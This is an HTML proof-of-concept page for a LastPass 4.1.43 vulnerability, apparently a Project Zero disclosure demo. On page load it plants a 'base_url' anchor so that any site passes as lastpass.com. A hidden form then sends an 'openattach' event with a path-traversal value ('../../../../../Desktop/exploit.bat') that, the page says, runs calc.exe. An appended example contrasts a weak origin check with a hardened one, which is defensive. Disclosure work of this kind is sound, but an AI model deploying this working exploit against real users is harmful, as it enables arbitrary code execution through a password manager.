<html>
<head>
<title>LastPass 4.1.43 Exploit</title>
<script>
// Runs on page load: adds an anchor element with id "base_url" whose href
// is this page's own host.
function start() {
  x = document.createElement("a");
  x.setAttribute("id", "base_url");
  x.setAttribute("href", "//" + document.location.hostname);
  document.body.appendChild(x);
  // exploit.submit();
}
</script>
</head>
<body onload="start()">
<p>
It's possible to convince LastPass 4.1.43 that any website is the privileged
domain lastpass.com, because LastPass incorrectly assumed that global
properties couldn't be set across isolated worlds.
<br/>
<br/>
If you have the "<a href="https://lastpass.com/support.php?cmd=showfaq&id=3206">Binary Component</a>" installed, this even allows arbitrary code execution.
Full details <a href="https://bugs.chromium.org/p/project-zero/issues/detail?id=1225">here</a>.
<br/>
<br/>
Click the button below to run calc.exe (this demo is Windows with Chrome only, but other platforms and browsers are affected).
<br/>
<br/>
</p>
<button onclick="exploit.submit()">
Run Calc
</button>
<br/>
<br/>
<p>
<a href="bin.png"><img width="35%" src="bin.png"></a>
</p>
<exploit id="g_loosebasematching" />
<form id="exploit" name="lpwebsiteeventform">
<input type="hidden" name="eventtype" value="openattach">
<input type="hidden" name="eventdata1" value="d44479a4ce97554c24399f651ca76899179dec81c854b38ef2389c3185ae8eec">
<input type="hidden" name="eventdata2" value="!8uK7g5j8Eq08Nr86mhmMxw==|1dSN0jXZSQ51V1ww9rk4DQ==">
<input type="hidden" name="eventdata3" value="other:./../../../../../Desktop/exploit.bat">
</form>
</body>
</html>
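
The flaw described on this page is a trust decision that depends on a global the visited page can define. As an added example (not LastPass code and not part of the original page), the JavaScript below contrasts a hypothetical check that trusts a `base_url` global with one that compares the document's own origin against a constant. The function names, the `attacker.example` URLs and the `fakeAnchor` stand-in are assumptions constructed for illustration.

```javascript
// Added example: hypothetical origin checks, not LastPass source code.
const PRIVILEGED_ORIGIN = "https://lastpass.com";

// Weak: trusts a global the page can define. `globals` stands in for the
// window object, where an element with an id appears as a named property.
function isPrivilegedWeak(globals, pageHref) {
  return pageHref.startsWith(String(globals.base_url));
}

// Hardened: ignores page-reachable globals, parses the document's own URL
// and compares its origin against a constant.
function isPrivilegedHardened(pageHref) {
  let url;
  try {
    url = new URL(pageHref);
  } catch (e) {
    return false; // an unparsable location is never privileged
  }
  return url.origin === PRIVILEGED_ORIGIN;
}

// Defence in depth: accept a configuration global only if it is a primitive
// string, so a DOM element (an object) falls back to the built-in default.
function readTrustedString(globals, name, fallback) {
  const value = globals[name];
  return typeof value === "string" ? value : fallback;
}

// Constructed stand-in for <a id="base_url" href="//host">: an anchor
// element stringifies to its resolved href.
function fakeAnchor(href) {
  return { tagName: "A", href, toString() { return this.href; } };
}

// Runs both checks against constructed inputs and returns the verdicts.
function demo() {
  const page = "https://attacker.example/poc.html"; // constructed URL
  const shadowed = { base_url: fakeAnchor("https://attacker.example/") };
  return {
    weak: isPrivilegedWeak(shadowed, page),
    hardened: isPrivilegedHardened(page),
    genuine: isPrivilegedHardened("https://lastpass.com/"),
    lookalike: isPrivilegedHardened("https://lastpass.com.attacker.example/"),
    guarded: readTrustedString(shadowed, "base_url", PRIVILEGED_ORIGIN + "/"),
  };
}

console.log(demo());
```

The hardened check never reads a value the page can influence, and the type guard rejects any global that turns out to be an object instead of a primitive string.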